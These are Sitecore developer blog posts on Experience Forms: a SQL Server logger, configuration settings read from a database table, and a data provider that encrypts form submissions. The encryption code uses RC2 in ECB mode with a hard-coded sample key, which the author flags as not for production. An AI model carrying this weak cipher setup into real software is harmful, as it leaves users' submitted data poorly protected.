entry makes its way into the database table. Moreover, I’m reusing the ISqlDataApiFactory instance above from my previous post. Have a read of it so you can see what this factory class does. Since Experience Forms was built perfectly — 😉 — I couldn’t see any LogEntry instances being saved to my database right away. So I went ahead and created some <forms.renderField> pipeline processors to capture some. The following interface is for a <forms.renderField> pipeline processor that just throws an exception by dividing by zero: using Sitecore.ExperienceForms.Mvc.Pipelines.RenderField; namespace Sandbox.Foundation.Forms.Pipelines.RenderField { public interface IThrowExceptionProcessor { void Process(RenderFieldEventArgs args); } } Here is its implementation class: using System; using Sitecore.ExperienceForms.Diagnostics; using Sitecore.ExperienceForms.Mvc.Pipelines.RenderField; namespace Sandbox.Foundation.Forms.Pipelines.RenderField { public class ThrowExceptionProcessor : IThrowExceptionProcessor { private readonly ILogger _logger; public ThrowExceptionProcessor(ILogger logger) { _logger = logger; } public void Process(RenderFieldEventArgs args) { try { int i = 1 / GetZero(); } catch(Exception ex) { _logger.LogError(ToString(), ex, this); } } private int GetZero() { return 0; } } } I’m sure you would never do such a thing, right?
😉 I then created the following interface for another <forms.renderField> pipeline processor to log some information on the RenderFieldEventArgs instance sent to the Process() method: using Sitecore.ExperienceForms.Mvc.Pipelines.RenderField; namespace Sandbox.Foundation.Forms.Pipelines.RenderField { public interface ILogRenderedFieldInfo { void Process(RenderFieldEventArgs args); } } Here is the implementation class for this: using Sitecore.ExperienceForms.Diagnostics; using Sitecore.ExperienceForms.Mvc.Pipelines.RenderField; using Sitecore.Mvc.Pipelines; namespace Sandbox.Foundation.Forms.Pipelines.RenderField { public class LogRenderedFieldInfo : MvcPipelineProcessor<RenderFieldEventArgs>, ILogRenderedFieldInfo { private readonly ILogger _logger; public LogRenderedFieldInfo(ILogger logger) { _logger = logger; } public override void Process(RenderFieldEventArgs args) { LogInfo($"ViewModel Details:\n\nName: {args.ViewModel.Name}, ItemId: {args.ViewModel.ItemId}, TemplateId: {args.ViewModel.TemplateId}, FieldTypeItemId: {args.ViewModel.FieldTypeItemId}"); LogInfo($"RenderingSettings Details\n\nFieldTypeName: {args.RenderingSettings.FieldTypeName}, FieldTypeId: {args.RenderingSettings.FieldTypeId}, FieldTypeIcon: {args.RenderingSettings.FieldTypeIcon}, FieldTypeDisplayName: {args.RenderingSettings.FieldTypeDisplayName}, FieldTypeBackgroundColor: {args.RenderingSettings.FieldTypeBackgroundColor}"); LogInfo($"Item Details: {args.Item.ID}, Name: {args.Item.Name} FullPath: {args.Item.Paths.FullPath}, TemplateID: {args.Item.TemplateID}"); } protected virtual void LogInfo(string message) { if(string.IsNullOrWhiteSpace(message)) { return; } _logger.Info(message); } } } I then registered everything in the Sitecore IoC container using the following configurator: using System; using Microsoft.Extensions.DependencyInjection; using Sitecore.Abstractions; using Sitecore.DependencyInjection; using Sitecore.ExperienceForms.Diagnostics; using Sandbox.Foundation.Forms.Services.Factories.Diagnostics; using Sandbox.Foundation.Forms.Services.Factories; using Sandbox.Foundation.Forms.Models.Logging; using Sandbox.Foundation.Forms.Services.Environment; using Sandbox.Foundation.Forms.Services.Diagnostics; using Sandbox.Foundation.Forms.Pipelines.RenderField; namespace Sandbox.Foundation.Forms { public class SqlLoggerConfigurator : IServicesConfigurator { public void Configure(IServiceCollection serviceCollection) { ConfigureConfigObjects(serviceCollection); ConfigureFactories(serviceCollection); ConfigureServices(serviceCollection); ConfigurePipelineProcessors(serviceCollection); } private void ConfigureConfigObjects(IServiceCollection serviceCollection) { serviceCollection.AddSingleton(provider => GetLogEntryServiceSettings(provider)); serviceCollection.AddSingleton(provider => GetSqlLoggerSettings(provider)); } private LogEntryServiceSettings GetLogEntryServiceSettings(IServiceProvider provider) { return CreateConfigObject<LogEntryServiceSettings>(provider, "moduleSettings/foundation/forms/logEntryServiceSettings"); } private SqlLoggerSettings GetSqlLoggerSettings(IServiceProvider provider) { return CreateConfigObject<SqlLoggerSettings>(provider, "moduleSettings/foundation/forms/sqlLoggerSettings"); } private TConfigObject CreateConfigObject<TConfigObject>(IServiceProvider provider, string path) where TConfigObject : class { BaseFactory factory = GetService<BaseFactory>(provider); return factory.CreateObject(path, true) as TConfigObject; } private TService GetService<TService>(IServiceProvider provider) { return 
provider.GetService<TService>(); } private void ConfigureFactories(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<ILogEntryFactory, LogEntryFactory>(); serviceCollection.AddSingleton<IRepositoryLogEntryFactory, RepositoryLogEntryFactory>(); serviceCollection.AddSingleton<ISqlDataApiFactory, SqlDataApiFactory>(); } private void ConfigureServices(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<IEnvironmentService, EnvironmentService>(); serviceCollection.AddSingleton<ILogEntryService, LogEntryService>(); serviceCollection.AddSingleton<ILogger, SqlLogger>(); } private void ConfigurePipelineProcessors(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<ILogRenderedFieldInfo, LogRenderedFieldInfo>(); serviceCollection.AddSingleton<IThrowExceptionProcessor, ThrowExceptionProcessor>(); } } } Note: the GetLogEntryServiceSettings() and GetSqlLoggerSettings() methods both create settings objects by using the Sitecore Configuration Factory. Ultimately, these settings objects are thrown into the container so they can be injected into the service classes that need them. I then strung everything together using the following Sitecore patch configuration file: <configuration xmlns:patch="http://www.sitecore.net/xmlconfig/"> <sitecore> <pipelines> <forms.renderField> <processor type="Sandbox.Foundation.Forms.Pipelines.RenderField.LogRenderedFieldInfo, Sandbox.Foundation.Forms" resolve="true"/> <processor type="Sandbox.Foundation.Forms.Pipelines.RenderField.ThrowExceptionProcessor, Sandbox.Foundation.Forms" resolve="true"/> </forms.renderField> </pipelines> <services> <configurator type="Sandbox.Foundation.Forms.SqlLoggerConfigurator, Sandbox.Foundation.Forms" /> <register serviceType="Sitecore.ExperienceForms.Diagnostics.ILogger, Sitecore.ExperienceForms"> <patch:delete /> </register> </services> <moduleSettings> <foundation> <forms> <logEntryServiceSettings type="Sandbox.Foundation.Forms.Models.Logging.LogEntryServiceSettings, Sandbox.Foundation.Forms" singleInstance="true"> <DebugLogEntryType>DEBUG</DebugLogEntryType> <ErrorLogEntryType>ERROR</ErrorLogEntryType> <FatalLogEntryType>FATAL</FatalLogEntryType> <InfoLogEntryType>INFO</InfoLogEntryType> <WarnLogEntryType>WARN</WarnLogEntryType> <ExceptionPrefix>Exception: </ExceptionPrefix> <MessagePrefix>Message: </MessagePrefix> <SourcePrefix>Source: </SourcePrefix> <NestedExceptionPrefix>Nested Exception</NestedExceptionPrefix> <LogEntryTimeFormat>HH:mm:ss.ff</LogEntryTimeFormat> </logEntryServiceSettings> <sqlLoggerSettings type="Sandbox.Foundation.Forms.Models.Logging.SqlLoggerSettings, Sandbox.Foundation.Forms" singleInstance="true"> <LogPrefix>[Experience Forms]:</LogPrefix> <LogDatabaseConnectionStringName>ExperienceFormsSettings</LogDatabaseConnectionStringName> <InsertLogEntrySqlFormat>INSERT INTO {0}ExperienceFormsLog{1}({0}LogEntryType{1},{0}LogMessage{1},{0}Created{1})VALUES({2}logEntryType{3},{2}logMessage{3},{2}created{3});</InsertLogEntrySqlFormat> <LogEntryTypeParameterName>logEntryType</LogEntryTypeParameterName> <LogMessageParameterName>logMessage</LogMessageParameterName> <CreatedParameterName>created</CreatedParameterName> </sqlLoggerSettings> </forms> </foundation> </moduleSettings> </sitecore> </configuration> Ok, let’s take this for a spin.
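Before we do, one quick note on that InsertLogEntrySqlFormat value: assuming the stock SqlServerDataApi formatting conventions hold here (as far as I can tell, {0} and {1} become the [ and ] identifier delimiters, while {2} and {3} produce @-prefixed parameter names), the statement that actually hits SQL Server should look something like this:

INSERT INTO [ExperienceFormsLog]([LogEntryType],[LogMessage],[Created])
VALUES(@logEntryType,@logMessage,@created);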
After building and deploying everything above, I spun up my Sitecore instance. I then navigated to a form I had created in a previous post. After the page with my form was done loading, I ran a query on my custom log table, and the new log entries were sitting right there. It worked. If you have any questions or comments, don’t hesitate to drop these in a comment below. Until next time, have yourself a Sitecoretastic day!

Grab Sitecore Experience Forms Configuration Settings from a Custom SQL Server Database Table

Just the other day, I was poking around Sitecore Experience Forms to see what’s customisable and have pretty much concluded virtually everything is. How? Just have a look at http://[instance]/sitecore/admin/showservicesconfig.aspx on your Sitecore instance and scan for “ExperienceForms”. You will also discover lots of its service classes are registered in Sitecore’s IoC container, which makes it easy to swap things out with your own service implementation classes as long as they implement the service types defined in the container. Since I love tinkering with all things in Sitecore — most especially when it comes to customising bits of it — I decided to have a crack at replacing IFormsConfigurationSettings — more specifically, Sitecore.ExperienceForms.Configuration.IFormsConfigurationSettings in Sitecore.ExperienceForms.dll, which represents Sitecore configuration settings for Experience Forms — as it appeared to be something simple enough to do. The IFormsConfigurationSettings interface represents the following configuration settings: the connection string name, the fields prefix and the fields index name. So, what did I do to customise it? I wrote a bunch of code — it’s all in this post — which pulls these settings from a custom SQL Server database table. Why did I do that? Well, I did it because I could. 😉 Years ago, long before my Sitecore days, I worked on ASP.NET Web Applications which had their configuration settings stored in SQL Server databases. Whether this was, or still is, a good idea is a discussion for another time, though you are welcome to drop a comment below with your thoughts. In the meantime, just roll with it, as the point of this post is to show that you can customise virtually everything in Experience Forms, and I’m just showing one example. I first created the following class which implements IFormsConfigurationSettings: using Sitecore.ExperienceForms.Configuration; namespace Sandbox.Foundation.Forms.Models.Configuration { public class SandboxFormsConfigurationSettings : IFormsConfigurationSettings { public string ConnectionStringName { get; set; } public string FieldsPrefix { get; set; } public string FieldsIndexName { get; set; } } } You might be asking “Mike, why did you create an implementation class when Experience Forms already provides one ‘out of the box’?” Well, all the properties defined in Sitecore.ExperienceForms.Configuration.IFormsConfigurationSettings — these are the same properties you see in the implementation class above — lack mutators in the interface. My implementation class of IFormsConfigurationSettings adds them in — I hate baking method calls into property accessors, as it doesn’t seem clean to me. ¯\_(ツ)_/¯ When I had a look at the “out of the box” implementation class of IFormsConfigurationSettings, I discovered direct calls to the GetSetting() method on the Sitecore.Configuration.Settings static class — this lives in Sitecore.Kernel.dll — but that doesn’t help me with setting those properties, hence the custom IFormsConfigurationSettings class above.
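Those mutators are also what let the repository further down hydrate the object with a plain object initializer, something along these lines (the values here are placeholders of my own, not the actual OOTB settings):

// Illustrative only; in the real solution the values come from the database table created below.
IFormsConfigurationSettings settings = new SandboxFormsConfigurationSettings
{
    ConnectionStringName = "ExperienceForms",
    FieldsPrefix = "field_",
    FieldsIndexName = "sitecore_experienceforms_index"
};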
Next, I used the following SQL script to create my custom settings database table: USE [ExperienceFormsSettings] GO CREATE TABLE [dbo].[FormsConfigurationSettings]( [FieldsPrefix] [nvarchar](max) NULL, [FieldsIndexName] [nvarchar](max) NULL, [ConnectionStringName] [nvarchar](max) NULL ) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY] GO I then inserted the settings from the configuration file snapshot above into my new table (I’ve omitted the SQL insert statement for this). Now we need a way to retrieve these settings from the database. The following interface will be for factory classes which create instances of Sitecore.Data.DataProviders.Sql.SqlDataApi — this lives in Sitecore.Kernel.dll — with the passed connection strings: using Sitecore.Data.DataProviders.Sql; namespace Sandbox.Foundation.Forms.Services.Factories { public interface ISqlDataApiFactory { SqlDataApi CreateSqlDataApi(string connectionString); } } Well, we can’t do much with an interface without having some class implement it. The following class implements the interface above: using Sitecore.Data.DataProviders.Sql; using Sitecore.Data.SqlServer; namespace Sandbox.Foundation.Forms.Services.Factories { public class SqlDataApiFactory : ISqlDataApiFactory { public SqlDataApi CreateSqlDataApi(string connectionString) { if(string.IsNullOrWhiteSpace(connectionString)) { return null; } return new SqlServerDataApi(connectionString); } } } It’s just creating an instance of the SqlServerDataApi class. Nothing special about it at all. Ironically, I do have to save my own configuration settings in Sitecore Configuration — this would include the connection string name of the database that contains my new table, as well as a few other things. An instance of the following class will contain these settings — have a look at /sitecore/moduleSettings/foundation/forms/repositorySettings in the Sitecore patch file near the bottom of this post, but be sure to come back up here when you are finished 😉 — and this instance will be put into the Sitecore IoC container so it can be injected into an instance of a class I’ll talk about further down in this post: namespace Sandbox.Foundation.Forms.Models.Configuration { public class RepositorySettings { public string ConnectionStringName { get; set; } public string GetSettingsSql { get; set; } public string ConnectionStringNameColumnName { get; set; } public string FieldsPrefixColumnName { get; set; } public string FieldsIndexNameColumnName { get; set; } public int NotFoundOrdinal { get; set; } } } I then defined the following interface for repository classes which retrieve IFormsConfigurationSettings instances: using Sitecore.ExperienceForms.Configuration; namespace Sandbox.Foundation.Forms.Repositories.Configuration { public interface ISettingsRepository { IFormsConfigurationSettings GetFormsConfigurationSettings(); } } Here’s the implementation class for the interface above: using System; using System.Data; using System.Linq; using Sitecore.Abstractions; using Sitecore.Data.DataProviders.Sql; using Sitecore.ExperienceForms.Configuration; using Sitecore.ExperienceForms.Diagnostics; using Sandbox.Foundation.Forms.Models.Configuration; using Sandbox.Foundation.Forms.Services.Factories; namespace Sandbox.Foundation.Forms.Repositories.Configuration { public class SettingsRepository : ISettingsRepository { private readonly RepositorySettings _repositorySettings; private readonly BaseSettings _settings; private readonly int _notFoundOrdinal; private readonly ILogger _logger; private readonly SqlDataApi
_sqlDataApi; public SettingsRepository(RepositorySettings repositorySettings, BaseSettings settings, ILogger logger, ISqlDataApiFactory sqlDataApiFactory) { _repositorySettings = repositorySettings; _settings = settings; _notFoundOrdinal = GetNotFoundOrdinal(); _logger = logger; _sqlDataApi = GetSqlDataApi(sqlDataApiFactory); } protected virtual SqlDataApi GetSqlDataApi(ISqlDataApiFactory sqlDataApiFactory) { return sqlDataApiFactory.CreateSqlDataApi(GetConnectionString()); } protected virtual string GetConnectionString() { return _settings.GetConnectionString(GetConnectionStringName()); } protected virtual string GetConnectionStringName() { return _repositorySettings.ConnectionStringName; } public IFormsConfigurationSettings GetFormsConfigurationSettings() { try { return _sqlDataApi.CreateObjectReader(GetSqlQuery(), GetParameters(), GetMaterializer()).FirstOrDefault(); } catch (Exception ex) { LogError(ex); } return CreateFormsConfigurationSettingsNullObject(); } protected virtual string GetSqlQuery() { return _repositorySettings.GetSettingsSql; } protected virtual object[] GetParameters() { return Enumerable.Empty<object>().ToArray(); } protected virtual Func<IDataReader, IFormsConfigurationSettings> GetMaterializer() { return new Func<IDataReader, IFormsConfigurationSettings>(ParseFormsConfigurationSettings); } protected virtual IFormsConfigurationSettings ParseFormsConfigurationSettings(IDataReader dataReader) { return new SandboxFormsConfigurationSettings { ConnectionStringName = GetString(dataReader, GetConnectionStringNameColumnName()), FieldsPrefix = GetString(dataReader, GetFieldsPrefixColumnName()), FieldsIndexName = GetString(dataReader, GetFieldsIndexNameColumnName()) }; } protected virtual string GetString(IDataReader dataReader, string columnName) { if(dataReader == null || string.IsNullOrWhiteSpace(columnName)) { return string.Empty; } int ordinal = GetOrdinal(dataReader, columnName); if(ordinal == _notFoundOrdinal) { return string.Empty; } return dataReader.GetString(ordinal); } protected virtual int GetOrdinal(IDataReader dataReader, string columnName) { if(dataReader == null || string.IsNullOrWhiteSpace(columnName)) { return _notFoundOrdinal; } try { return dataReader.GetOrdinal(columnName); } catch(IndexOutOfRangeException) { return _notFoundOrdinal; } } protected virtual int GetNotFoundOrdinal() { return _repositorySettings.NotFoundOrdinal; } protected virtual void LogError(Exception exception) { _logger.LogError(ToString(), exception, this); } protected virtual string GetConnectionStringNameColumnName() { return _repositorySettings.ConnectionStringNameColumnName; } protected virtual string GetFieldsPrefixColumnName() { return _repositorySettings.FieldsPrefixColumnName; } protected virtual string GetFieldsIndexNameColumnName() { return _repositorySettings.FieldsIndexNameColumnName; } protected virtual IFormsConfigurationSettings CreateFormsConfigurationSettingsNullObject() { return new SandboxFormsConfigurationSettings { ConnectionStringName = string.Empty, FieldsIndexName = string.Empty, FieldsPrefix = string.Empty }; } } } I’m not going to go into details of all the code above but will talk about some important pieces. 
The GetFormsConfigurationSettings() method above creates an IFormsConfigurationSettings instance using the SqlDataApi instance created from the injected factory service (defined above), the SQL query provided from configuration, and the GetMaterializer() method, which just uses the ParseFormsConfigurationSettings() method to build the IFormsConfigurationSettings instance by grabbing data from the IDataReader instance. Phew, I’m out of breath as that was a mouthful. 😉 I then registered all of my service classes above in the Sitecore IoC container using the following configurator — aka a class that implements the IServicesConfigurator interface: using System; using Microsoft.Extensions.DependencyInjection; using Sitecore.Abstractions; using Sitecore.DependencyInjection; using Sitecore.ExperienceForms.Configuration; using Sandbox.Foundation.Forms.Repositories.Configuration; using Sandbox.Foundation.Forms.Models.Configuration; using Sandbox.Foundation.Forms.Services.Factories; namespace Sandbox.Foundation.Forms { public class SettingsConfigurator : IServicesConfigurator { public void Configure(IServiceCollection serviceCollection) { serviceCollection.AddSingleton(provider => GetRepositorySettings(provider)); serviceCollection.AddSingleton<ISqlDataApiFactory, SqlDataApiFactory>(); serviceCollection.AddSingleton<ISettingsRepository, SettingsRepository>(); serviceCollection.AddSingleton(provider => GetFormsConfigurationSettings(provider)); } private RepositorySettings GetRepositorySettings(IServiceProvider provider) { return CreateConfigObject<RepositorySettings>(provider, "moduleSettings/foundation/forms/repositorySettings"); } private TConfigObject CreateConfigObject<TConfigObject>(IServiceProvider provider, string path) where TConfigObject : class { BaseFactory factory = GetService<BaseFactory>(provider); return factory.CreateObject(path, true) as TConfigObject; } private IFormsConfigurationSettings GetFormsConfigurationSettings(IServiceProvider provider) { ISettingsRepository repository = GetService<ISettingsRepository>(provider); return repository.GetFormsConfigurationSettings(); } private TService GetService<TService>(IServiceProvider provider) { return provider.GetService<TService>(); } } } One thing to note is the GetRepositorySettings() method above uses the Configuration Factory — this is represented by the BaseFactory abstract class, which lives in the Sitecore IoC container “out of the box” — to create an instance of the RepositorySettings class, defined further up in this post, using the settings in the following Sitecore patch file: <configuration xmlns:patch="http://www.sitecore.net/xmlconfig/"> <sitecore> <services> <configurator type="Sandbox.Foundation.Forms.SettingsConfigurator, Sandbox.Foundation.Forms" /> <register serviceType="Sitecore.ExperienceForms.Configuration.IFormsConfigurationSettings, Sitecore.ExperienceForms"> <patch:delete /> </register> </services> <moduleSettings> <foundation> <forms> <repositorySettings type="Sandbox.Foundation.Forms.Models.Configuration.RepositorySettings, Sandbox.Foundation.Forms" singleInstance="true"> <ConnectionStringName>ExperienceFormsSettings</ConnectionStringName> <GetSettingsSql>SELECT TOP (1) {0}ConnectionStringName{1},{0}FieldsPrefix{1},{0}FieldsIndexName{1} FROM {0}FormsConfigurationSettings{1}</GetSettingsSql> <ConnectionStringNameColumnName>ConnectionStringName</ConnectionStringNameColumnName> <FieldsPrefixColumnName>FieldsPrefix</FieldsPrefixColumnName>
<FieldsIndexNameColumnName>FieldsIndexName</FieldsIndexNameColumnName> <NotFoundOrdinal>-1</NotFoundOrdinal> </repositorySettings> </forms> </foundation> </moduleSettings> </sitecore> </configuration> I want to point out that I’m deleting the Sitecore.ExperienceForms.Configuration.IFormsConfigurationSettings service from Sitecore’s configuration, as I am adding it back into the Sitecore IoC container with my own via the configurator above. After deploying everything, I waited for my Sitecore instance to reload. Once Sitecore was responsive again, I navigated to “Forms” on the Sitecore Launch Pad and made sure everything still worked as before. It did. Trust me, it did. 😉 If you have any questions/comments on any of the above, or would just like to drop a line to say “hello”, then please share in a comment below. Otherwise, until next time, keep on Sitecoring.

Encrypt Sitecore Experience Forms Data in Powerful Ways

Last week, I was honoured to co-present Sitecore Experience Forms alongside my dear friend — and fellow trollster 😉 — Sitecore MVP Kamruz Jaman at SUGCON EU 2018. We had a blast showing the ins and outs of Experience Forms, and of course trolled a bit whilst on the main stage. During our talk, Kamruz mentioned the possibility of replacing the “Out of the Box” (OOTB) Sitecore.ExperienceForms.Data.IFormDataProvider — this lives in Sitecore.ExperienceForms.dll, and its class implementations serve as Repository objects for storing data in, or retrieving it from, some datastore (MS SQL Server OOTB in Experience Forms) — with another implementation that encrypts/decrypts data when saving to or retrieving from the datastore. Well, I had done something exactly like this for Web Forms for Marketers (WFFM) about five years ago — be sure to have a read of my blog post on this before proceeding, as it gives context to the rest of this blog post — so I thought it would be appropriate to have a swing at doing this for Experience Forms. I first created an interface for classes that will encrypt/decrypt strings — this is virtually the same interface I had used in my older post on encrypting data in WFFM: namespace Sandbox.Foundation.Forms.Services.Encryption { public interface IEncryptor { string Encrypt(string key, string input); string Decrypt(string key, string input); } } I then created a class to encrypt/decrypt strings using the RC2 encryption algorithm — I had also poached this from my older post on encrypting data in WFFM (please note, this encryption algorithm is not the most robust, so do not use this in any production environment.
Please be sure to use something more robust): using System.Text; using System.Security.Cryptography; namespace Sandbox.Foundation.Forms.Services.Encryption { public class RC2Encryptor : IEncryptor { public string Encrypt(string key, string input) { byte[] inputArray = UTF8Encoding.UTF8.GetBytes(input); RC2CryptoServiceProvider rc2 = new RC2CryptoServiceProvider(); rc2.Key = UTF8Encoding.UTF8.GetBytes(key); rc2.Mode = CipherMode.ECB; rc2.Padding = PaddingMode.PKCS7; ICryptoTransform cTransform = rc2.CreateEncryptor(); byte[] resultArray = cTransform.TransformFinalBlock(inputArray, 0, inputArray.Length); rc2.Clear(); return System.Convert.ToBase64String(resultArray, 0, resultArray.Length); } public string Decrypt(string key, string input) { byte[] inputArray = System.Convert.FromBase64String(input); RC2CryptoServiceProvider rc2 = new RC2CryptoServiceProvider(); rc2.Key = UTF8Encoding.UTF8.GetBytes(key); rc2.Mode = CipherMode.ECB; rc2.Padding = PaddingMode.PKCS7; ICryptoTransform cTransform = rc2.CreateDecryptor(); byte[] resultArray = cTransform.TransformFinalBlock(inputArray, 0, inputArray.Length); rc2.Clear(); return UTF8Encoding.UTF8.GetString(resultArray); } } } Next, I created the following class to store settings I need for encrypting and decrypting data using the RC2 algorithm class above: namespace Sandbox.Foundation.Forms.Models { public class FormEncryptionSettings { public string EncryptionKey { get; set; } } } The encryption key above is needed for the RC2 algorithm to encrypt/decrypt data. I set this key in a config object defined in a Sitecore patch configuration file towards the bottom of this post. I then created an interface for classes that will encrypt/decrypt FormEntry instances (FormEntry objects contain submitted data from form submissions): using Sitecore.ExperienceForms.Data.Entities; namespace Sandbox.Foundation.Forms.Services.Encryption { public interface IFormEntryEncryptor { void EncryptFormEntry(FormEntry entry); void DecryptFormEntry(FormEntry entry); } } The following class implements the interface above: using System.Linq; using Sitecore.ExperienceForms.Data.Entities; using Sandbox.Foundation.Forms.Models; namespace Sandbox.Foundation.Forms.Services.Encryption { public class FormEntryEncryptor : IFormEntryEncryptor { private readonly FormEncryptionSettings _formEncryptionSettings; private readonly IEncryptor _encryptor; public FormEntryEncryptor(FormEncryptionSettings formEncryptionSettings, IEncryptor encryptor) { _formEncryptionSettings = formEncryptionSettings; _encryptor = encryptor; } public void EncryptFormEntry(FormEntry entry) { if (!HasFields(entry)) { return; } foreach (FieldData field in entry.Fields) { EncryptField(field); } } protected virtual void EncryptField(FieldData field) { if(field == null) { return; } field.FieldName = Encrypt(field.FieldName); field.Value = Encrypt(field.Value); field.ValueType = Encrypt(field.ValueType); } protected virtual string Encrypt(string input) { return _encryptor.Encrypt(_formEncryptionSettings.EncryptionKey, input); } public void DecryptFormEntry(FormEntry entry) { if (!HasFields(entry)) { return; } foreach (FieldData field in entry.Fields) { DecryptField(field); } } protected virtual bool HasFields(FormEntry entry) { return entry != null && entry.Fields != null && entry.Fields.Any(); } protected virtual void DecryptField(FieldData field) { if(field == null) { return; } field.FieldName = Decrypt(field.FieldName); field.Value = Decrypt(field.Value); field.ValueType = Decrypt(field.ValueType); } protected virtual 
string Decrypt(string input) { return _encryptor.Decrypt(_formEncryptionSettings.EncryptionKey, input); } } } The EncryptFormEntry() method above iterates over all FieldData objects contained on the FormEntry instance, and passes them to the EncryptField() method which encrypts the FieldName, Value and ValueType properties on them. Likewise, the DecryptFormEntry() method iterates over all FieldData objects contained on the FormEntry instance, and passes them to the DecryptField() method which decrypts the same properties mentioned above. I then created an interface for classes that will serve as factories for IFormDataProvider instances: using Sitecore.ExperienceForms.Data; using Sitecore.ExperienceForms.Data.SqlServer; namespace Sandbox.Foundation.Forms.Services.Factories { public interface IFormDataProviderFactory { IFormDataProvider CreateNewSqlFormDataProvider(ISqlDataApiFactory sqlDataApiFactory); } } The following class implements the interface above: using Sitecore.ExperienceForms.Data; using Sitecore.ExperienceForms.Data.SqlServer; namespace Sandbox.Foundation.Forms.Services.Factories { public class FormDataProviderFactory : IFormDataProviderFactory { public IFormDataProvider CreateNewSqlFormDataProvider(ISqlDataApiFactory sqlDataApiFactory) { return new SqlFormDataProvider(sqlDataApiFactory); } } } The CreateNewSqlFormDataProvider() method above does exactly what its name says. You’ll see it being used in the following class below. This next class ultimately becomes the new IFormDataProvider instance but decorates the OOTB one which is created from the factory class above: using System; using System.Collections.Generic; using System.Linq; using Sitecore.ExperienceForms.Data; using Sitecore.ExperienceForms.Data.Entities; using Sitecore.ExperienceForms.Data.SqlServer; using Sandbox.Foundation.Forms.Services.Encryption; using Sandbox.Foundation.Forms.Services.Factories; namespace Sandbox.Foundation.Forms.Services.Data { public class FormEncryptionDataProvider : IFormDataProvider { private readonly IFormDataProvider _innerProvider; private readonly IFormEntryEncryptor _formEntryEncryptor; public FormEncryptionDataProvider(ISqlDataApiFactory sqlDataApiFactory, IFormDataProviderFactory formDataProviderFactory, IFormEntryEncryptor formEntryEncryptor) { _innerProvider = CreateInnerProvider(sqlDataApiFactory, formDataProviderFactory); _formEntryEncryptor = formEntryEncryptor; } protected virtual IFormDataProvider CreateInnerProvider(ISqlDataApiFactory sqlDataApiFactory, IFormDataProviderFactory formDataProviderFactory) { return formDataProviderFactory.CreateNewSqlFormDataProvider(sqlDataApiFactory); } public void CreateEntry(FormEntry entry) { EncryptFormEntryField(entry); _innerProvider.CreateEntry(entry); } protected virtual void EncryptFormEntryField(FormEntry entry) { _formEntryEncryptor.EncryptFormEntry(entry); } public void DeleteEntries(Guid formId) { _innerProvider.DeleteEntries(formId); } public IReadOnlyCollection<FormEntry> GetEntries(Guid formId, DateTime? startDate, DateTime?
endDate) { IReadOnlyCollection<FormEntry> entries = _innerProvider.GetEntries(formId, startDate, endDate); if(entries == null || !entries.Any()) { return entries; } foreach(FormEntry entry in entries) { DecryptFormEntryField(entry); } return entries; } protected virtual void DecryptFormEntryField(FormEntry entry) { _formEntryEncryptor.DecryptFormEntry(entry); } } } The class above delegates to the IFormEntryEncryptor instance to encrypt the FormEntry data and then passes the FormEntry to the inner provider for saving. For decrypting, it retrieves the data from the inner provider, and then decrypts it via the IFormEntryEncryptor instance before returning it to the caller. Finally, I created an IServicesConfigurator class to wire everything up into the Sitecore container (I hope you are using Sitecore Dependency Injection capabilities as this comes OOTB — there are no excuses for not using this!): using System; using Microsoft.Extensions.DependencyInjection; using Sitecore.Abstractions; using Sitecore.DependencyInjection; using Sitecore.ExperienceForms.Data; using Sandbox.Foundation.Forms.Models; using Sandbox.Foundation.Forms.Services.Encryption; using Sandbox.Foundation.Forms.Services.Data; using Sandbox.Foundation.Forms.Services.Factories; namespace Sandbox.Foundation.Forms { public class FormsServicesConfigurator : IServicesConfigurator { public void Configure(IServiceCollection serviceCollection) { serviceCollection.AddSingleton(provider => GetFormEncryptionSettings(provider)); serviceCollection.AddSingleton<IEncryptor, RC2Encryptor>(); serviceCollection.AddSingleton<IFormEntryEncryptor, FormEntryEncryptor>(); serviceCollection.AddSingleton<IFormDataProviderFactory, FormDataProviderFactory>(); serviceCollection.AddSingleton<IFormDataProvider, FormEncryptionDataProvider>(); } private FormEncryptionSettings GetFormEncryptionSettings(IServiceProvider provider) { return CreateConfigObject<FormEncryptionSettings>(provider, "moduleSettings/foundation/forms/formEncryptionSettings"); } private TConfigObject CreateConfigObject<TConfigObject>(IServiceProvider provider, string path) where TConfigObject : class { BaseFactory factory = GetService<BaseFactory>(provider); return factory.CreateObject(path, true) as TConfigObject; } private TService GetService<TService>(IServiceProvider provider) { return provider.GetService<TService>(); } } } Everything above is normal service class registration except for the stuff in the GetFormEncryptionSettings() method. Here, I’m creating an instance of a FormEncryptionSettings class but am instantiating it using the Sitecore Configuration Factory for the configuration object defined in the Sitecore patch configuration file below, and making it available for injection into classes that need it (the FormEntryEncryptor above uses it).
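Before moving on, a quick smoke test can confirm the encrypt/decrypt round trip behaves. The following is a minimal sketch rather than production code: it assumes FormEntry.Fields can be assigned directly (adjust if your version populates it differently), and it borrows the sample key from the patch file below.

using System.Collections.Generic;
using Sitecore.ExperienceForms.Data.Entities;
using Sandbox.Foundation.Forms.Models;
using Sandbox.Foundation.Forms.Services.Encryption;

namespace Sandbox.Foundation.Forms.Sandbox
{
    public static class EncryptionSmokeTest
    {
        public static void Run()
        {
            // Sample key from the patch file below; swap in your own.
            var settings = new FormEncryptionSettings { EncryptionKey = "88bca90e90875a" };
            IFormEntryEncryptor encryptor = new FormEntryEncryptor(settings, new RC2Encryptor());

            // Assumes Fields is assignable; build one field the way a form submission would.
            FormEntry entry = new FormEntry
            {
                Fields = new List<FieldData>
                {
                    new FieldData { FieldName = "Email", Value = "jane@example.com", ValueType = "System.String" }
                }
            };

            encryptor.EncryptFormEntry(entry); // FieldName, Value and ValueType become ciphertext
            encryptor.DecryptFormEntry(entry); // ...and are decrypted back to the original plaintext
        }
    }
}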
